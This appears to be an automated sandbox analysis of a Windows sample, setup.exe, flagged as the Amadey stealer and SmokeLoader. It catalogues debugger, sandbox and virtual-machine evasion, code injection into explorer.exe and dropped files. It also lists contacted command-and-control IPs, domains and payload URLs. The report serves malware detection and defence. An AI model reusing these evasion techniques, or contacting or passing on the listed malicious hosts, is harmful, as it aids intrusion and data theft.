Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B06C6 second address: 48B06D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820D9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B06D5 second address: 48B06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B06D9 second address: 48B06F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B06F6 second address: 48B0776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007FBA2516CD4Dh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 pushfd 0x00000015 jmp 00007FBA2516CD59h 0x0000001a xor ch, 00000056h 0x0000001d jmp 00007FBA2516CD51h 0x00000022 popfd 0x00000023 popad 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FBA2516CD4Eh 0x0000002b push 48B7E3C3h 0x00000030 pushad 0x00000031 call 00007FBA2516CD57h 0x00000036 mov ax, 649Fh 0x0000003a pop ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B0776 second address: 48B07CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 3E4F23DBh 0x0000000e jmp 00007FBA24820D9Ah 0x00000013 push FECCB455h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FBA24820D9Ah 0x00000021 and cx, 1338h 0x00000026 jmp 00007FBA24820D9Bh 0x0000002b popfd 0x0000002c jmp 00007FBA24820DA8h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B07CB second address: 48B07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 7CEAFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 994C06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 9F4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 29EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 464C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4C4D47 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04900D8D rdtsc 0_2_04900D8D
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 400 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 464 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 862 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 883 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4284 Thread sleep count: 110 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4284 Thread sleep time: -220110s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2604 Thread sleep count: 400 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2604 Thread sleep time: -12000000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5352 Thread sleep count: 101 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5352 Thread sleep time: -202101s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1408 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5244 Thread sleep count: 102 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5244 Thread sleep time: -204102s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1776 Thread sleep count: 88 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1776 Thread sleep time: -176088s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5700 Thread sleep count: 93 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5700 Thread sleep time: -186093s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2604 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1720 Thread sleep count: 464 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4476 Thread sleep count: 125 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3808 Thread sleep count: 117 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5560 Thread sleep count: 309 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3836 Thread sleep count: 72 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5136 Thread sleep count: 53 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: axplong.exe, axplong.exe, 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATAa
Source: explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`3(
Source: explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: axplong.exe, 00000007.00000002.3273525737.0000000001288000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.000000000126E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: setup.exe, 00000000.00000002.2066747834.000000000094C000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2095632033.000000000041C000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2105636632.000000000041C000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2783388537.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw System information queried: CodeIntegrityInformation Jump to behavior
Hides threads from debuggers
Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_051E0388 Start: 051E03EC End: 051E034B 7_2_051E0388
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04900D8D rdtsc 0_2_04900D8D
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0026645B mov eax, dword ptr fs:[00000030h] 7_2_0026645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0026A1C2 mov eax, dword ptr fs:[00000030h] 7_2_0026A1C2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_0248366F push dword ptr fs:[00000030h] 8_2_0248366F
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_025C092B mov eax, dword ptr fs:[00000030h] 8_2_025C092B
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_025C0D90 mov eax, dword ptr fs:[00000030h] 8_2_025C0D90
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_024935CF push dword ptr fs:[00000030h] 10_2_024935CF
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0408092B mov eax, dword ptr fs:[00000030h] 10_2_0408092B
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_04080D90 mov eax, dword ptr fs:[00000030h] 10_2_04080D90

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: wsjctfw.9.dr Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Thread created: C:\Windows\explorer.exe EIP: 3341988 Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Thread created: unknown EIP: 1231988 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe "C:\Users\user\AppData\Local\Temp\1000030001\2.exe" Jump to behavior
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: axplong.exe, axplong.exe, 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmp, explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000009.00000000.2783192687.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.2781222412.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0024D312 cpuid 7_2_0024D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000030001\2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000030001\2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0024CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_0024CB1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_002365B0 LookupAccountNameA, 7_2_002365B0

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 7.2.axplong.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2066678423.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2055063157.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2095516685.0000000000231000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2025249873.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2662669127.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2064925770.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2105418070.0000000000231000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected SmokeLoader
Source: Yara match File source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483208 Sample: setup.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 38 wshcnsd.xyz 2->38 40 yosoborno.com 2->40 42 2 other IPs or domains 2->42 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 56 8 other signatures 2->56 8 setup.exe 5 2->8         started        12 axplong.exe 16 2->12         started        15 wsjctfw 2->15         started        17 axplong.exe 2->17         started        signatures3 54 Performs DNS queries to domains with low reputation 38->54 process4 dnsIp5 28 C:\Users\user\AppData\Local\...\axplong.exe, PE32 8->28 dropped 30 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 8->30 dropped 74 Detected unpacking (changes PE section rights) 8->74 76 Tries to evade debugger and weak emulator (self modifying code) 8->76 78 Tries to detect virtualization through RDTSC time measurements 8->78 19 axplong.exe 8->19         started        44 185.215.113.16, 49712, 49714, 49715 WHOLESALECONNECTIONSNL Portugal 12->44 46 atlpvt.com 58.65.168.132, 443, 49713 NAYATEL-PKNayatelPvtLtdPK Pakistan 12->46 32 C:\Users\user\AppData\Local\Temp\...\2.exe, PE32 12->32 dropped 34 C:\Users\user\AppData\Local\...\2[1].exe, PE32 12->34 dropped 80 Hides threads from debuggers 12->80 82 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->82 84 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->84 22 2.exe 12->22         started        86 Machine Learning detection for dropped file 15->86 88 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->88 90 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 15->90 92 4 other signatures 15->92 file6 signatures7 process8 signatures9 58 Antivirus detection for dropped file 19->58 60 Tries to detect sandboxes and other dynamic analysis tools (window names) 19->60 62 Tries to evade debugger and weak emulator (self modifying code) 19->62 70 4 other signatures 19->70 64 Detected unpacking (changes PE section rights) 22->64 66 Machine Learning detection for dropped file 22->66 68 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 22->68 72 4 other signatures 22->72 24 explorer.exe 50 2 22->24 injected process10 file11 36 C:\Users\user\AppData\Roaming\wsjctfw, PE32 24->36 dropped 94 Benign windows process drops PE files 24->94 96 Hides that the sample has been downloaded from the Internet (zone.identifier) 24->96 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
58.65.168.132
 atlpvt.com Pakistan
23674 NAYATEL-PKNayatelPvtLtdPK false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted Domains

Name IP Active
atlpvt.com 58.65.168.132 true
wshcnsd.xyz unknown unknown
yosoborno.com unknown unknown
nusdhj.ws unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nusdhj.ws/tmp/ true
  • Avira URL Cloud: safe
 unknown
https://atlpvt.com/tmp/2.exe false
  • Avira URL Cloud: safe
 unknown
http://yosoborno.com/tmp/ true
  • Avira URL Cloud: safe
 unknown
http://wshcnsd.xyz/tmp/ true
  • Avira URL Cloud: safe
 unknown
http://185.215.113.16/Jo89Ku7d/index.php true
  • Avira URL Cloud: phishing
 unknown